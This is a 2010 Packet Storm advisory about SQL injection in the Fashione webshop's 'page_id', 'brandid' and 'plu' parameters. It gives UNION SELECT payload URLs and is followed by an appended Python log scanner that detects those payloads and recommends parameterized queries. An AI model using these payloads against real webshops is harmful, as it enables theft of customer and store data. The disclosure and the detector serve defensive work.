Fashione E-Commerce Webshop SQL Injection

2010-09-21T00:00:00
ID PACKETSTORM:94027
Type packetstorm
Reporter secret
Modified 2010-09-21T00:00:00

Description

                                        
`#####################################################################  
  
# Exploit Title: Fashione E-Commerce Webshop Multiple SQL Injection Vulnerabilities  
# Date: 2010-09-19  
# Author: secret  
# Contact : mohammed.atta@hotmail.com / ICQ : 17-33-77  
# Site : swissfaking.net/board  
# Software Link: http://www.fashione.co.uk/  
# Version: All versions so far  
# Tested on: XP  
  
# Fixed? : NOT FIXED  
  
----------------------------------------------------------------------------  
  
[Multiple SQL Injection Vulnerabilities] "brandid=" / "plu=" / "page_id="  
  
e.g. http://server/index.php?page_id=-1+and+1=0+Union+Select+[VISIBLE],2,3,4  
  
e.g. http://server/index.php?page_id=prod&brandid=248&brand_name=LUKE 1977&plu=0001246502+and+1=0+Union+Select+[VISIBLE],2,3,4  
  
e.g. http://server/index.php?page_id=prod&brandid=248+and+1=0+Union+Select+[VISIBLE],2,3,4  
  
################################################################################################  
  
[THANKS TO]  
  
ALLAH - الله لا إله لا ايل  
  
To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION   
  
`
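
A defender-side check for the requests shown above, added here as an example (not part of the original advisory or the vendor's code): it scans web access-log lines for "page_id", "brandid" and "plu" values that carry UNION-style SQL or do not match the expected shape. The value patterns, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed value shapes, inferred from the advisory's sample URLs
# (page_id=prod, brandid=248, plu=0001246502); adjust to the real application.
EXPECTED = {
    "page_id": re.compile(r"[A-Za-z0-9_]{1,32}"),
    "brandid": re.compile(r"[0-9]{1,10}"),
    "plu": re.compile(r"[0-9]{1,20}"),
}
# Tokens typical of the UNION-based strings in the advisory, matched after URL decoding.
SQLI = re.compile(r"\bunion\b.*\bselect\b|\b(and|or)\b\s+\d+\s*=\s*\d+", re.I | re.S)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_url(url):
    """Return (param, decoded_value, reason) findings for one request URL."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        pattern = EXPECTED.get(name)
        if pattern is None:
            continue  # parameter not named in the advisory
        if SQLI.search(value):
            findings.append((name, value, "sql-keywords"))
        elif not pattern.fullmatch(value):
            findings.append((name, value, "unexpected-format"))
    return findings

def scan_log(lines):
    """Scan combined-format access-log lines; return {line_number: findings}."""
    hits = {}
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        found = check_url(m.group(1)) if m else []
        if found:
            hits[no] = found
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Sep/2010:10:00:01 +0000] "GET /index.php?page_id=prod&brandid=248&plu=0001246502 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [21/Sep/2010:10:00:09 +0000] "GET /index.php?page_id=-1+and+1=0+Union+Select+1,2,3,4 HTTP/1.1" 200 4981',
    '192.0.2.77 - - [21/Sep/2010:10:00:15 +0000] "GET /index.php?page_id=prod&brandid=248%20and%201=0%20union%20select%201,2,3,4 HTTP/1.1" 200 4990',
    '192.0.2.10 - - [21/Sep/2010:10:00:20 +0000] "GET /index.php?page_id=prod&brandid=24a8 HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for no, found in scan_log(SAMPLE_LOG).items():
        print(no, found)
```

The same allowlist patterns can be enforced server-side before the values reach a query; the durable fix for this class of bug is parameterized queries.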